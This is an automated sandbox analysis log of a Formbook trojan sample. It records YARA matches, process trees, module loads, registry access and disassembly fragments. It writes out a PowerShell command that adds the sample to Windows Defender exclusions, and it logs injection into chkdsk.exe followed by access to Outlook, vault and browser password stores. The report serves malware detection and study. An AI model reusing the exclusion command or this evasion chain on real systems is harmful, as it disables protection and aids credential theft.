Source: 00000011.00000002.4132492127.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1835227889.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1836465483.00000000081C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4130273413.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@18/11@15/10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7344
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32e4yub0.p44.ps1

Jump to behavior

Source: eNXDCIvEXI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: eNXDCIvEXI.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chkdsk.exe, 0000000C.00000003.2016327210.0000000004D4D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4129628243.0000000004D4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: eNXDCIvEXI.exe	Virustotal: Detection: 50%
Source: eNXDCIvEXI.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

File read: C:\Users\user\Desktop\eNXDCIvEXI.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eNXDCIvEXI.exe "C:\Users\user\Desktop\eNXDCIvEXI.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7344 -s 1632
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\eNXDCIvEXI.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: eNXDCIvEXI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: eNXDCIvEXI.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: eNXDCIvEXI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_wp.exe, 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1720116499.00000000052F3000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1716627525.0000000004EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000002.1835508384.000000000563E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1834961654.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1837166918.000000000500E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdb source: aspnet_wp.exe, aspnet_wp.exe, 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1720116499.00000000052F3000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000003.1716627525.0000000004EC5000.00000004.00000020.00020000.00000000.sdmp, aspnet_wp.exe, 00000005.00000002.1835508384.000000000563E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000C.00000003.1834961654.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.000000000535E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4131036726.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1837166918.000000000500E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdbGCTL source: aspnet_wp.exe, 00000005.00000002.1835368494.00000000051F7000.00000004.00000020.00020000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129545365.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdbq1 source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4128969978.00000000006BE000.00000002.00000001.01000000.00000008.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 00000011.00000002.4128967885.00000000006BE000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: System.Dynamic.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Drawing.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: chkdsk.pdb source: aspnet_wp.exe, 00000005.00000002.1835368494.00000000051F7000.00000004.00000020.00020000.00000000.sdmp, FCJpElfgCpDtTJPmdGdlIYAgNj.exe, 0000000A.00000002.4129545365.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Management.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb- source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdb source: WER3AAF.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3AAF.tmp.dmp.9.dr

Source: eNXDCIvEXI.exe

Static PE information: 0xD6D03363 [Wed Mar 15 14:27:47 2084 UTC]

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B8900BD pushad ; iretd	0_2_00007FFD9B8900C1
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Code function: 0_2_00007FFD9B9B04AB push esp; retf 4810h	0_2_00007FFD9B9B0552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00414074 push eax; retf	5_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00412002 push esp; retf	5_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00414138 push eax; retf	5_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004039F0 push eax; ret	5_2_004039F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004239A3 push edi; ret	5_2_004239AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_004052EB push es; ret	5_2_004052F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00425B23 push edi; ret	5_2_00425B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00405664 push esp; retf	5_2_0040567A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00411788 push esp; ret	5_2_00411789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_00411FB3 push esp; retf	5_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D09AD push ecx; mov dword ptr [esp], ecx	5_2_054D09B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_051F09AD push ecx; mov dword ptr [esp], ecx	12_2_051F09B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00822130 push edi; ret	12_2_0082213B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080E5C0 push esp; retf	12_2_0080E650
